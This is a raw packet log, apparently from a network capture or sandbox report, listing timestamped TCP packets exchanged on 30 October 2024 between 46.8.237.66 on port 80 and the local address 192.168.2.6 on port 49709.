                              Oct 30, 2024 20:19:05.589292049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589303970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589344978 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.589781046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589791059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589799881 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589809895 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589821100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589831114 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589833975 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.589858055 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.589884043 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.590280056 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590291023 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590301037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590311050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590321064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590327978 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.590332031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590342999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590353012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590358019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.590365887 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590375900 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590380907 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.590401888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591048956 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591058016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591068029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591078043 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591088057 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591097116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591104031 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591115952 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591125965 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591137886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591149092 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591150045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591173887 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591747046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591757059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591767073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591777086 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591787100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591797113 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591837883 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.632190943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632241011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632249117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632294893 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.632407904 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632419109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632452965 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.632469893 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632514954 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.632730961 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632834911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632844925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632883072 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.674762011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.674814939 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.674850941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.674861908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.674895048 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.674998999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.675010920 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.675054073 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.707860947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.707945108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.707957029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708009958 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.708112001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708122015 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708131075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708169937 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.708197117 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.708247900 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708796024 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708810091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708818913 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708828926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708848000 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.708889961 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.709153891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709162951 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709204912 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.709325075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709342003 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709352970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709362984 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709369898 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.709372997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709383965 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709394932 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709403038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709413052 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.709453106 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710124969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710135937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710145950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710155964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710166931 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710174084 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710226059 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710417986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710428953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710441113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710452080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710463047 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710478067 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710524082 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710760117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710771084 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710776091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710784912 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710794926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710812092 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710813999 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710822105 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710832119 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710841894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710845947 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710851908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710875034 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710900068 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.711416960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711427927 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711436987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711448908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711460114 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.711461067 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711472988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711483955 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711492062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711498976 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.711529016 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.751854897 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.751943111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.751945019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.751955986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752010107 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.752039909 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752051115 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752060890 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752067089 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752099037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.752121925 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.752228975 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752239943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752249002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752283096 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.752360106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752370119 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752415895 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.794159889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794203997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794214964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794250011 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.794296026 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.794325113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794337034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794374943 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.794465065 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827409983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827449083 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827461004 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827466011 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.827547073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827584982 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.827630997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827641964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827682972 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.827800035 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827810049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827819109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827850103 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.827898026 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828147888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828155994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828201056 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828277111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828288078 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828299046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828310966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828322887 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828322887 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828366041 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828530073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828541040 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828556061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828566074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828579903 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828633070 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828774929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828784943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828824997 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.829047918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829058886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829070091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829081059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829091072 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829102993 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829113007 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829122066 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829127073 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.829133034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829181910 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.829526901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829705000 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829716921 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829726934 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829735994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829745054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829752922 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.829756021 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829766035 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829777002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829793930 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.829822063 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.830244064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830255032 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830265999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830276012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830286026 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830296040 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830306053 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830316067 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830318928 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.830324888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830384970 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.830384970 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.830769062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830780029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830790997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830802917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.830830097 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.830869913 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.871393919 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871455908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871464968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871525049 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.871552944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871567965 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871620893 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.871632099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871675014 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.871681929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871777058 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871787071 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871798038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.871828079 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.871876955 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.872122049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.872134924 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.872170925 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.913960934 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.913970947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.913976908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.913988113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.914067030 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.914100885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.946983099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947037935 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.947068930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947081089 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947118998 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.947189093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947326899 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947338104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947376966 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.947602034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947613001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947654009 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.947788000 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947798967 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947808981 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947818995 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.947839975 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.947881937 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.948214054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948225021 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948235989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948247910 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948256969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948263884 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.948312998 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.948508978 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948518991 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948527098 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948538065 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948546886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948568106 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.948595047 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948596001 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.948606014 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948616028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948626041 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948636055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948645115 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.948646069 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.948672056 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.949469090 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949481964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949491024 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949501038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949512005 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949520111 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.949522018 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949532032 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949542999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949553013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949562073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949567080 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.949572086 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949603081 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.949629068 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.949927092 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949939013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949949026 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949960947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.949978113 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.950016022 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.950145960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950155973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950166941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950177908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950221062 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.950467110 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950476885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950488091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950498104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950509071 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950519085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950520039 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.950529099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.950572014 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.992937088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.992986917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.992986917 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.992999077 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.993050098 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.993175030 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.993185997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.993195057 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.993201017 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.993237019 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.993246078 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.993257999 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.993310928 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:06.033657074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.033730984 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.033741951 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.033791065 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:06.033844948 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.033855915 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.033911943 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:06.066745996 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.066765070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.066773891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.066807032 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:06.066847086 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:06.066932917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.066943884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.066987038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:06.067100048 CET804970946.8.237.66192.168.2.6
